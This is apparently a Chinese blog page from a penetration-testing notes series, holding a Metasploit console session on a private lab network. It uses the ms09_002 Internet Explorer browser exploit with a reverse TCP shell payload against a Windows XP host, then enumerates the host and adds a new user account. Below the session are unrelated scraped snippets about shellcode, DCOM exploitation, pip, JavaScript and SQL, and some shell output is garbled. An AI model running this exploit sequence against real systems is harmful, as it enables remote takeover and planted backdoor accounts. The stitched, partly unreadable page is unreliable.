Welcome to the Metasploit Web Console!

| | _) |

__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|

| | | __/ | ( |\__ \ | | | ( | | |

_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|

_|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]

+ -- --=[ 566 exploits - 283 auxiliary

+ -- --=[ 210 payloads - 27 encoders - 8 nops

=[ svn r9834 updated 308 days ago (2010.07.14)

Warning: This copy of the Metasploit Framework was last updated 308 days ago.

We recommend that you update the framework at least every other day.

For information on updating your copy of Metasploit, please see:

http://www.metasploit.com/redmine/projects/framework/wiki/Updating

>> use windows/browser/ms09_002_memory_corruption

>> set payload windows/shell/reverse_tcp

payload => windows/shell/reverse_tcp

>> show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

SRVHOST 0.0.0.0 yes The local host to listen on.

SRVPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL for incoming connections

SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

>> set SRVHOST 172.16.2.100

SRVHOST => 172.16.2.100

>> set LHOST 172.16.2.100

LHOST => 172.16.2.100

>> show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

SRVHOST 172.16.2.100 yes The local host to listen on.

SRVPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL for incoming connections

SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process

LHOST 172.16.2.100 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

>> exploit

[*] Exploit running as background job.

[*] Started reverse handler on 172.16.2.100:4444

[*] Using URL: http://172.16.2.100:8080/9wZVWxuy

[*] Server started.

>> back

>> sessions -l

Active sessions

===============

Id Type Information Connection

-- ---- ----------- ----------

1 shell 172.16.2.100:4444 -> 172.16.2.120:1125

>> sessions -i 1

sessions -i 1

'sessions' 2?ê??ú2??òía2??üá?£?ò22?ê??é??DDμ?3ìDò

?ò?ú′|àí???t?£

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> ipconfig /all

ipconfig /all

Windows IP Configuration

Host Name . . . . . . . . . . . . : www-95a235b5556

Primary Dns Suffix . . . . . . . :

Node Type . . . . . . . . . . . . : Unknown

IP Routing Enabled. . . . . . . . : No

WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> net user

net user

\\WWW-95A235B5556 μ?ó??§?ê?§

-------------------------------------------------------------------------------

Administrator Guest HelpAssistant

SUPPORT_388945a0

?üá?3é1|íê3é?£

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> net user shentouceshiwy /add

net user shentouceshiwy /add

?üá?3é1|íê3é?£

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> net user

net user

\\WWW-95A235B5556 μ?ó??§?ê?§

-------------------------------------------------------------------------------

Administrator Guest HelpAssistant

shentouceshiwy SUPPORT_388945a0

?üá?3é1|íê3é?£

渗透杂记-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7的更多相关文章

  1. Windows XP PRO SP3 - Full ROP calc shellcode

    /*     Shellcode: Windows XP PRO SP3 - Full ROP calc shellcode     Author: b33f (http://www.fuzzysec ...

  2. Windows XP with SP3大客户免激活日文版

    原贴地址:http://www.humin.com.cn/ja_windows_xp_professional_with_service_pack_3_x86_dvd_vl_x14-74058-iso ...

  3. “Invalid configuration file. File "I:/My Virtual Machines/Windows XP english Professional/Windows XP Professional.vmx" was created by a VMware product

    “Invalid configuration file. File "I:/My Virtual Machines/Windows XP english Professional/Windo ...

  4. 渗透测试实例Windows XP SP2

    一.msf> use exploit/windows/dcerpc/ms03_026_dcom.看到命令提示符的改变表明该命令已经运行成功. 二.为漏洞利用代码设置必要的参数,show opti ...

  5. Windows XP SP2上安装.net 4

    1.安装 KB893803-v2-x86 2.安装dotnetfx35 3.安装dotNetFx40_Client_x86_x64 4.安装 NET Framework 4.0

  6. Windows XP系统服役13年今正式退休

    清明已过,服役13年的微软Windows XP系统也于今日正式“退休”.尽管这之后XP系统仍可以继续使用,但微软不再提供官方服务支持.对于中国数以亿计的XP用户来说,一方面是对已经使用了13年的操作系 ...

  7. 渗透杂记-2013-07-13 windows/mssql/mssql_payload

    扫描一下 Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间 NSE: Loaded 49 scripts f ...

  8. 技术文集:万能WINDOWS XP封装

    这里将系统封装分为3步:做系统.封装.部署 一.做系统 平台不限,但不建议在虚拟机上制作.CPU及主板芯片没有限制,关于intelide和intelppm的不兼容问题,深度白金3in1并没有删除这些注 ...

  9. 渗透杂记-2013-07-13 关于SMB版本的扫描

    smb2的溢出,其实在metasploit里面有两个扫描器可以用,效果都差不多,只是一个判断的更加详细,一个只是粗略的判断. Welcome to the Metasploit Web Console ...

  10. 最新的windows xp sp3序列号(绝对可通过正版验证)

    MRX3F-47B9T-2487J-KWKMF-RPWBY(工行版) 可用(强推此号) QC986-27D34-6M3TY-JJXP9-TBGMD(台湾交大学生版) 可用 CM3HY-26VYW-6J ...

随机推荐

  1. python pip安装问题

    scipy-0.18.1-cp34-cp34m-win32.whl is not a supported wheel on this platform. 遇到该问题需要更新pip版本 1.更新pip: ...

  2. js判断手指滑动方向(移动端)

    var startx, starty; //获得角度 function getAngle(angx, angy) { return Math.atan2(angy, angx) * 180 / Mat ...

  3. sql存储过程异常捕获并输出例子还有不输出过程里面判断异常 例子

    编程的异常处理很重要,当然Sql语句中存储过程的异常处理也很重要,明确的异常提示能够快速的找到问题的根源,节省很多时间. 下面,我就以一个插入数据为例来说明Sql Server中的存储过程怎么捕获异常 ...

  4. OEIS A140358

    以前也许做过? 有点方 最小整数1到k 加减得到 n 1+-2+-3+-...+-k = n 求最小k #include <cstdio> #include <algorithm&g ...

  5. IE环境下判断IE版本的语句...[if lte IE 6]……[endif][if lte IE 7]……[endif]

    <!--[if IE 6]> <![endif]--> 只有IE6版本可见 <!--[if lte IE 6]> <![endif]--> IE6及其以 ...

  6. Node.js Express 框架 GET方法

    GET 方法 以下实例演示了在表单中通过 GET 方法提交两个参数,我们可以使用 server.js 文件内的 process_get 路由器来处理输入: index.htm 文件代码如下: < ...

  7. SpringMVC 温故而知新

    http://www.cnblogs.com/bigdataZJ/p/5815467.html直接引用别人的吧,没时间呀

  8. 夺命雷公狗-----React---25--小案例之react经典案例todos(单选框的修改)

    还是老样子,首先给li里面的单选框一个函数,然后通过props来对她进行处理 然后在ul里面对父组建进行传送 补充一下啊第一步,因为到时候要用到index属性,所以我们需要发送多一个index过来 然 ...

  9. jquery 通过ajax FormData 对象上传附件

    之前上传附件都是用插件,或者用form表单体检(这个是很久以前的方式了),今天突发奇想,自己来实现附件上传,具体实现如下 html: <div>   流程图: <input id=& ...

  10. C# ComBox 垂直滚动条

    用到Combox控件两个属性: 1 MaxDorpDownItems 显示条数 2 IntegralHeight 设置 为false 例如:显示最多20条,超过20条显示垂直滚动条 this.comb ...